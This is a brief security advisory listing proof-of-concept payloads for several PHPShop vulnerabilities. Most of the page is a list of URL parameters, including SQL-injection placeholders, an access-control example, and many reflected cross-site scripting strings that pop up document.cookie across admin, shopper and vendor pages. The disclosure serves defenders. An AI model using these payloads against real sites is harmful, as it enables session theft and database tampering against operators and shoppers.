|
|
PHPShop Project Multiple Vulnerabilities
No exploit is required to carry out a successful attack. The following proof of concept examples have been supplied: page=[Evil_Query] page=shop/cart&func=cartAdd&product_id=[Evil_Query] page=shop/browse&category_id=&offset=[Evil_Query] page=account/shipto&user_info_id=[Valid User ID] page=admin/index&GulfTech="><script>alert(document.cookie)</script> page=shop/browse&category_id="><script>alert(document.cookie)</script> func="><script>alert(document.cookie)</script> login="><script>alert(document.cookie)</script> page=account/shipto&user_info_id="><script>alert(document.cookie)</script> page=shopper/index&module_description="><script>alert(document.cookie)</script> page=shopper/menu&menu_label="><script>alert(document.cookie)</script> page=shopper/menu&shopper_list_mn="><script>alert(document.cookie)</script> page=shopper/menu&modulename="><script>alert(document.cookie)</script> page=shopper/menu&shopper_group_list_mnu="><script>alert(document.cookie)</script> page=shopper/menu&shopper_group_form_mnu="><script>alert(document.cookie)</script> page=vendor/index&module_description="><script>alert(document.cookie)</script> page=vendor/index&menu_label="><script>alert(document.cookie)</script> page=vendor/index&sess="><script>alert(document.cookie)</script> page=vendor/index&leftbar_title_bgcolor="><script>alert(document.cookie)</script> |
|
Privacy Statement |